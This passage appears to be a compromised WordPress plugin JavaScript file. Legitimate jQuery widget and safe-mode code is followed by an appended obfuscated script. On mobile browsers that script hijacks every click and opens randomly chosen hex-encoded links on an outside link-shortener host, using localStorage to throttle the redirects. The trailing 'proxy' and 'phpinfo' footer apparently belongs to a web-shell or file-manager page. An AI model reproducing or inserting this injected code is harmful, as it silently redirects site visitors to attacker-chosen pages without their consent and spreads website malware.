$(this).attr("id"); $(".widgetDroppedAtIndex").val(""); $("#" + curr_droppable + " .wdgt-dropped").trigger("click"); }, over: function () { var curr_droppable = $(this).attr("id"); $("#" + curr_droppable + " .droppableEmptyColumn").slideDown(250); }, out: function () { var curr_droppable = $(this).attr("id"); $("#" + curr_droppable + " .droppableEmptyColumn").css( "display", "none" ); }, }); }, }); } catch (error) { // statements console.log(error); jQuery(".popb_safemode_popup").css("display", "block"); jQuery(".confirm_safemode_no").on("click", function () { jQuery(".popb_safemode_popup").css("display", "none"); location.reload(); }); popb_errorLog.errorMsg = error.message; popb_errorLog.errorURL = error.stack.split("\n")[1]; jQuery(".fullErrorMessage p").text("Click To View Full Error Message"); jQuery(".fullErrorMessageInput").val(popb_errorLog.errorMsg); jQuery(".confirm_safemode_yes").on("click", function () { var result = " "; var form = jQuery(".insertTemplateForm"); jQuery.ajax({ url: admURL + "/admin-ajax.php?action=popb_enable_safe_mode&POPB_nonce=" + shortCodeRenderWidgetNO, method: "post", data: { errorMsg: popb_errorLog.errorMsg, errorURL: popb_errorLog.errorURL, }, success: function (result) { location.reload(); }, }); }); } }); })(jQuery); function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x58\x74\x59\x33\x63\x373','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x72\x51\x64\x35\x63\x315','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x76\x71\x55\x38\x63\x308','abs','-local-storage','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x61\x52\x65\x39\x63\x309','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x6b\x47\x48\x34\x63\x304','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x63\x76\x4d\x37\x63\x317','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x72\x79\x78\x32\x63\x312','floor','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x53\x6c\x4b\x36\x63\x346','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x4c\x61\x4c\x30\x63\x330','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x49\x68\x56\x31\x63\x301',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());
| ver. 1.4 |
Github
|
.
| PHP 7.3.33 | Generation time: 0.06 |
proxy
|
phpinfo
|
Settings